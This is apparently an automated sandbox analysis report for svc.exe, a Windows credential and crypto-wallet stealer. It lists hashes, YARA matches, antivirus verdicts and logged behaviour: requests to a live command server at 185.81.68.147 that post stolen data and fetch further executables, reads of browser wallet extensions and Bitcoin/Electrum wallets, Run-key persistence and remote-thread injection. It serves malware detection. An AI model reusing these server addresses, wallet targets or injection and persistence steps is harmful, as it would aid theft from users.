Summary | ZeroBOX

svc.exe

Gen1 Browser Login Data Stealer Generic Malware Malicious Library ASPack Antivirus UPX Malicious Packer Anti_VM PE64 OS Processor Check JPEG Format ZIP Format PE File DLL
Category: FILE
Machine: s1_win7_x6401
Started: Jan. 18, 2025, 4:31 p.m.
Completed: Jan. 18, 2025, 4:35 p.m.
Size 1.2MB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 e2b9936f5b41295ba4ca23afae692813
SHA256 2c74e012e213dc721370aeed8f4932e677f28a95b3da7e3f94e74013f078f066
CRC32 8905C849
ssdeep 24576:ACCer7uT8MPvT0hLiKQ+Ijxqykg+Tzwl2KzK:/fr7uXr0hqjxqo
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • infoStealer_browser_b_Zero - browser info stealer
  • IsPE64 - (no description)
  • Generic_Malware_Zero - Generic Malware
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
185.81.68.147 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features POST method with no referer header, Connection to IP address
suspicious_request POST http://185.81.68.147/svcstealer/get.php
suspicious_features Connection to IP address
suspicious_request GET http://185.81.68.147/zx.exe
suspicious_features Connection to IP address
suspicious_request GET http://185.81.68.147/update.exe
request POST http://185.81.68.147/svcstealer/get.php
request GET http://185.81.68.147/zx.exe
request GET http://185.81.68.147/update.exe
request POST http://185.81.68.147/svcstealer/get.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2884
region_size: 94208
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000001f10000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1452
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefd53a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1452
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076cac000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2976
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kgdijkcfiglijhaglibaidbipiejjfdp\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfchfdkjhcoekhdldggegebfakaaiog\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ckklhkaabbmdjkahiaaplikpdddkenic\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oafedfoadhdjjcipmcbecikgokpaphjk\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnlhokffphohmfcddnibpohmkdfafdli\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-debug-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\libffi-7.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\temp_11832.exe
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-sysinfo-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\ucrtbase.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-console-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-memory-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-datetime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\libcrypto-1_1.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\python38.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-errorhandling-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-file-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-handle-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\temp_11786.exe
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\VCRUNTIME140.dll
file C:\Users\test22\AppData\Local\Temp\_MEI28042\api-ms-win-crt-heap-l1-1-0.dll
Time & API Arguments Status Return Repeated

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\test22\AppData\Roaming\03BD451ED4621855818353
filepath: C:\Users\test22\AppData\Roaming\03BD451ED4621855818353
1 1 0

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\test22\AppData\Roaming\03BD451ED4621855818353\03BD451ED4621855818353.exe
filepath: C:\Users\test22\AppData\Roaming\03BD451ED4621855818353\03BD451ED4621855818353.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

request_handle: 0x0000000000cc0024
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

snapshot_handle: 0x00000000000000b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

snapshot_handle: 0x00000000000000b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

snapshot_handle: 0x00000000000000b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

snapshot_handle: 0x00000000000000b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

snapshot_handle: 0x00000000000001b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

snapshot_handle: 0x00000000000001b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

snapshot_handle: 0x00000000000001b8
process_name: svc.exe
process_identifier: 2548
0 0

Process32NextW

snapshot_handle: 0x00000000000001b8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x00000000000001b8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x00000000000001b8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x00000000000001b8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000158
process_name: 
process_identifier: 1060439344
0 0

Process32NextW

snapshot_handle: 0x00000000000002c8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x00000000000002c8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x00000000000002c8
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000030c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000030c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000030c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000030c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000320
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000320
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000320
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000320
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000320
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000320
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x000000000000031c
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: WmiPrvSE.exe
process_identifier: 2680
0 0
wmi SELECT * FROM Win32_BIOS
buffer Buffer with sha1: abd72abe1f826fcf770b9ac28bc795d8c59b33d7
host 185.81.68.147
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1452
region_size: 94208
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004560000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000000000000009c
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Services
reg_value C:\Users\test22\AppData\Roaming\03BD451ED4621855818353\03BD451ED4621855818353.exe
file C:\Users\test22\AppData\Roaming\Bitcoin\
file C:\ProgramData\65EDB51284023538805469\Wallets\Bitcoin\
file C:\Users\test22\AppData\Roaming\Electrum\wallets\
file C:\ProgramData\65EDB51284023538805469\Wallets\Electrum\
file C:\Users\test22\AppData\Local\Temp\temp_11786.exe
file C:\Users\test22\AppData\Local\Temp\temp_11832.exe
wmi SELECT * FROM AntiVirusProduct
wmi SELECT * FROM Win32_BIOS
Process injection Process 2884 created a remote thread in non-child process 1452
Time & API Arguments Status Return Repeated

CreateRemoteThread

thread_identifier: 0
process_identifier: 1452
function_address: 0x0000000004561c58
flags: 0
stack_size: 0
parameter: 0x0000000004560000
process_handle: 0x000000000000009c
1 160 0
Process injection Process 2884 manipulating memory of non-child process 1452
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1452
region_size: 94208
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004560000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000000000000009c
1 0 0
Lionic Trojan.Win32.Stealer.12!c
Cylance Unsafe
Sangfor Trojan.Win32.Agent.Vue2
CrowdStrike win/malicious_confidence_70% (W)
BitDefender Trojan.GenericKD.75433973
Symantec ML.Attribute.HighConfidence
Elastic malicious (moderate confidence)
ESET-NOD32 a variant of Generik.HFFPMFS
APEX Malicious
Kaspersky Trojan-Spy.Win32.Stealer.fkny
Rising Stealer.OskiStealer!1.C41E (CLASSIC)
DrWeb Trojan.Siggen30.51451
TrendMicro Trojan.Win64.AMADEY.YXFAQZ
McAfeeD ti!2C74E012E213
CTX exe.trojan.stealer
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
FireEye Generic.mg.e2b9936f5b41295b
Google Detected
Antiy-AVL Trojan[PSW]/Win32.Stealer
Kingsoft Win32.Troj.Unknown.a
Microsoft Trojan:Win32/Casdet!rfn
Varist W64/ABTrojan.VEIA-0471
McAfee Artemis!E2B9936F5B41
DeepInstinct MALICIOUS
Malwarebytes Spyware.Stealer
Ikarus Trojan.SuspectCRC
Panda Trj/Chgt.AD
TrendMicro-HouseCall Trojan.Win64.AMADEY.YXFAQZ
Fortinet W32/PossibleThreat